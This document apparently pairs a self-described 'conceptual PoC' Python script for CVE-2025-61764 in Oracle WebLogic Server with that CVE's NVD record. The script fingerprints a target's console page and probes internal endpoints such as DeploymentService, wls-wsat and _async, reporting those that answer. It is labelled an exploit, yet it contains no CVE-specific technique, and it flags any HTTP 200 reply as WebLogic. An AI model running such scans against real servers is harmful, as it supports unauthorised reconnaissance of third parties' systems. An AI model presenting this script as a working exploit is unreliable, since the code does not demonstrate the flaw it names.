CVE-2025-61764

# CVE-2025-61764 - Oracle WebLogic Server Information Disclosure PoC # Note: This is a conceptual PoC based on publicly available information. # The actual exploitation details have not been fully disclosed. import requests import sys TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target:7001" def check_weblogic_version(): """Check Oracle WebLogic Server version""" try: # Attempt to identify WebLogic Server via console page response = requests.get(f"{TARGET_URL}/console/login/LoginForm.jsp", timeout=10) if "WebLogic" in response.text or response.status_code == 200: print(f"[+] Oracle WebLogic Server detected at {TARGET_URL}") return True except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False def exploit_info_disclosure(): """ Attempt to exploit the information disclosure vulnerability in Oracle WebLogic Server Core component (CVE-2025-61764). Affected versions: 12.2.1.4.0, 14.1.1.0.0, 14.1.2.0.0 """ headers = { "User-Agent": "Mozilla/5.0", "Accept": "*/*" } # Common endpoints that may be vulnerable to info disclosure endpoints = [ "/console/framework/skins/wlsconsole/images/Logo.png", "/bea_wls_deployment_internal/DeploymentService", "/wls-wsat/CoordinatorPortType", "/_async/AsyncResponseService" ] for endpoint in endpoints: try: url = f"{TARGET_URL}{endpoint}" response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200 and len(response.content) > 0: print(f"[+] Accessible endpoint: {url}") print(f" Response length: {len(response.content)} bytes") except requests.exceptions.RequestException: pass if __name__ == "__main__": if check_weblogic_version(): exploit_info_disclosure() else: print("[-] Target does not appear to be running Oracle WebLogic Server")

{"cve": {"id": "CVE-2025-61764", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:53.027", "lastModified": "2025-10-24T14:27:36.910", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0, 14.1.1.0.0 and 14.1.2.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "04BCDC24-4A21-473C-8733-0D9CFB38A752"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:weblogic_server:14.1.2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "0FCA3D99-4596-4CF0-B5E1-7A6497F83B83"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}